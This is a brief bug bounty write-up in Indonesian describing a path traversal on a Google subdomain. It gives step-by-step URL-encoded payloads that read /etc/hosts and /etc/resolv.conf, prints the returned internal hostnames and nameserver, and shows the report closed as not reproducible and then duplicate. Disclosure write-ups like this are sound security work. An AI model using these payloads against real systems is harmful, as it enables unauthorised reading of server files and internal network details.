reading etc/hosts bug bounty google
haii,kali ini saya mau bikin writeups reading etc%2Fhosts dan etc%2Fresolv.conflangsung saja deh.step :1.buka browser web https://uxr-optout.withgoogle.com/2.setelah itu tambahkan payload %2F%2F%2Fetc%2Fhosts atau %2F%2F%2Fetc%2Fresolv.conf pada akhir web3.seperti ini atau ini4.selanjutnya akan menampilkan response dari %2Fetc%2Fhosts seperti ini127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appenginedan response etc%2Fresolv.conf seperti ininameserver 169.254.169.254 search google.internal.5.dari payload tersebut server mengizinkan kita membaca system dari %2Fetc%2Fhosts dan etc%2Fresolv.confuntuk video singkat silakhan kunjungi youtube sayaREPORT →: 28 Jul 2020 12.27Assigned → Not Reproducible : 30 Jul 2020 20.46DUPLICATE → 31 Jul 2020 21.46
Facebook | Twitter | WhatsApp | Cetak